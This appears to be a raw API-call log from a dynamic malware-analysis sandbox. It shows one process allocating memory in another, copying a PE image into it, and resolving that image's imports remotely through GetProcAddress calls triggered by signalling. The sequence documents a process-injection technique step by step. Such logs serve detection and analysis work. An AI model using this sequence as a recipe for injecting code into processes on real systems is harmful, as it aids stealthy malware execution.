	[0197.385] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x10000000, lpBuffer=0x2fd0020*, nSize=0x400, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x2fd0020*, lpNumberOfBytesWritten=0x1286e4*=0x400) returned 1
	[0197.385] VirtualProtectEx (in: hProcess=0x4a8, lpAddress=0x10000000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x1286e4 | out: lpflOldProtect=0x1286e4*=0x4) returned 1
	[0197.385] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x10001000, dwSize=0xc8e00, flAllocationType=0x1000, flProtect=0x4) returned 0x10001000
	[0197.387] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xc8e00) returned 0x2590020
	[0197.398] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x10001000, lpBuffer=0x2590020*, nSize=0xc8e00, lpNumberOfBytesWritten=0x1286d0 | out: lpBuffer=0x2590020*, lpNumberOfBytesWritten=0x1286d0*=0xc8e00) returned 1
	[0197.464] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x10001000, lpBuffer=0x2fd0420*, nSize=0xc8e00, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x2fd0420*, lpNumberOfBytesWritten=0x1286e4*=0xc8e00) returned 1
	[0197.480] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x100ca000, dwSize=0x23a00, flAllocationType=0x1000, flProtect=0x4) returned 0x100ca000
	[0197.481] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0x23a00) returned 0x2590020
	[0197.485] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca000, lpBuffer=0x2590020*, nSize=0x23a00, lpNumberOfBytesWritten=0x1286d0 | out: lpBuffer=0x2590020*, lpNumberOfBytesWritten=0x1286d0*=0x23a00) returned 1
	[0197.490] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca000, lpBuffer=0x3099220*, nSize=0x23a00, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x3099220*, lpNumberOfBytesWritten=0x1286e4*=0x23a00) returned 1
	[0197.494] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x100ee000, dwSize=0x1f698, flAllocationType=0x1000, flProtect=0x4) returned 0x100ee000
	[0197.495] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0x1f6a0) returned 0x2590020
	[0197.495] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ee000, lpBuffer=0x2590020*, nSize=0x1f698, lpNumberOfBytesWritten=0x1286d0 | out: lpBuffer=0x2590020*, lpNumberOfBytesWritten=0x1286d0*=0x1f698) returned 1
	[0197.544] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ee000, lpBuffer=0x30bcc20*, nSize=0x1ca00, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x30bcc20*, lpNumberOfBytesWritten=0x1286e4*=0x1ca00) returned 1
	[0197.547] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x1010e000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x1010e000
	[0197.547] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0x200) returned 0x2590020
	[0197.549] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x1010e000, lpBuffer=0x2590020*, nSize=0x200, lpNumberOfBytesWritten=0x1286d0 | out: lpBuffer=0x2590020*, lpNumberOfBytesWritten=0x1286d0*=0x200) returned 1
	[0197.549] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x1010e000, lpBuffer=0x30d9620*, nSize=0x200, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x30d9620*, lpNumberOfBytesWritten=0x1286e4*=0x200) returned 1
	[0197.550] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x1010f000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x1010f000
	[0197.550] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0x400) returned 0x2590020
	[0197.550] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x1010f000, lpBuffer=0x2590020*, nSize=0x400, lpNumberOfBytesWritten=0x1286d0 | out: lpBuffer=0x2590020*, lpNumberOfBytesWritten=0x1286d0*=0x400) returned 1
	[0197.550] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x1010f000, lpBuffer=0x30d9820*, nSize=0x400, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x30d9820*, lpNumberOfBytesWritten=0x1286e4*=0x400) returned 1
	[0197.551] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x10110000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x10110000
	[0197.551] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0x200) returned 0x2590020
	[0197.551] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x10110000, lpBuffer=0x2590020*, nSize=0x200, lpNumberOfBytesWritten=0x1286d0 | out: lpBuffer=0x2590020*, lpNumberOfBytesWritten=0x1286d0*=0x200) returned 1
	[0197.552] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x10110000, lpBuffer=0x30d9c20*, nSize=0x200, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x30d9c20*, lpNumberOfBytesWritten=0x1286e4*=0x200) returned 1
	[0197.552] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x10111000, dwSize=0x7400, flAllocationType=0x1000, flProtect=0x4) returned 0x10111000
	[0197.552] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0x7400) returned 0x26a4060
	[0197.557] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x10111000, lpBuffer=0x26a4060*, nSize=0x7400, lpNumberOfBytesWritten=0x1286d0 | out: lpBuffer=0x26a4060*, lpNumberOfBytesWritten=0x1286d0*=0x7400) returned 1
	[0197.558] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x10111000, lpBuffer=0x30d9e20*, nSize=0x7400, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x30d9e20*, lpNumberOfBytesWritten=0x1286e4*=0x7400) returned 1
	[0197.560] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.560] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0197.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30bc2c6, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0197.560] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307d98
	[0197.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30bc2c6, cbMultiByte=-1, lpWideCharStr=0x2307d98, cchWideChar=13 | out: lpWideCharStr="KERNEL32.dll") returned 13
	[0197.560] lstrlenW (lpString="KERNEL32.dll") returned 12
	[0197.560] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.560] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x2307d98*, nSize=0x1a, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x2307d98*, lpNumberOfBytesWritten=0x12857c*=0x1a) returned 1
	[0197.561] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x128500 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x128500*=0x70) returned 1
	[0197.561] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.561] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.561] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0xc, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f8*=0xc) returned 1
	[0197.562] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x128520*, nSize=0x70, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesWritten=0x1284f8*=0x70) returned 1
	[0197.562] ResetEvent (hEvent=0x498) returned 1
	[0197.562] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.562] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x1284f8*=0x70) returned 1
	[0197.562] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.562] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.562] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.562] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307d98) returned 1
	[0197.563] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.563] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.563] lstrlenA (lpString="GetFileAttributesW") returned 18
	[0197.563] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.563] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bbeda*, nSize=0x13, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bbeda*, lpNumberOfBytesWritten=0x12857c*=0x13) returned 1
	[0197.563] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.563] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.563] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.563] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.564] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.564] ResetEvent (hEvent=0x498) returned 1
	[0197.564] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.564] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.564] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.564] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.564] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.564] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca088, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.565] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.565] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.565] lstrlenA (lpString="GetCurrentThreadId") returned 18
	[0197.565] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.565] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bbef0*, nSize=0x13, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bbef0*, lpNumberOfBytesWritten=0x12857c*=0x13) returned 1
	[0197.565] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.565] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.565] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.565] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.566] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.566] ResetEvent (hEvent=0x498) returned 1
	[0197.566] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.566] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.566] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.566] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.566] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.567] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca08c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.567] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.567] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.567] lstrlenA (lpString="UnmapViewOfFile") returned 15
	[0197.567] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.567] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bbf06*, nSize=0x10, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bbf06*, lpNumberOfBytesWritten=0x12857c*=0x10) returned 1
	[0197.567] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.568] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.568] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.568] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.568] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.568] ResetEvent (hEvent=0x498) returned 1
	[0197.568] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.568] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.568] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.569] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.569] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.569] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca090, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.569] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.569] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.569] lstrlenA (lpString="HeapValidate") returned 12
	[0197.569] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.569] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bbf18*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bbf18*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0197.570] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.570] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.570] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.570] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.570] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.570] ResetEvent (hEvent=0x498) returned 1
	[0197.570] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.571] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.571] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.571] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.571] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.571] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca094, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.571] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.571] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.571] lstrlenA (lpString="HeapSize") returned 8
	[0197.571] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.571] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bbf28*, nSize=0x9, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bbf28*, lpNumberOfBytesWritten=0x12857c*=0x9) returned 1
	[0197.572] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.572] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.572] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.572] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.572] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.573] ResetEvent (hEvent=0x498) returned 1
	[0197.573] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.573] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.573] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.573] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.573] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.573] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca098, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.573] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.574] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.574] lstrlenA (lpString="MultiByteToWideChar") returned 19
	[0197.574] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.574] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bbf34*, nSize=0x14, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bbf34*, lpNumberOfBytesWritten=0x12857c*=0x14) returned 1
	[0197.574] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.574] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.574] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.574] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.575] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.575] ResetEvent (hEvent=0x498) returned 1
	[0197.575] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.575] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.575] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.575] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.575] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.575] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca09c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.576] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.576] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.576] lstrlenA (lpString="GetTempPathA") returned 12
	[0197.576] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.576] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bbf4a*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bbf4a*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0197.576] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.576] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.576] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.576] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.577] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.577] ResetEvent (hEvent=0x498) returned 1
	[0197.577] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.601] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.601] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.601] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.601] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
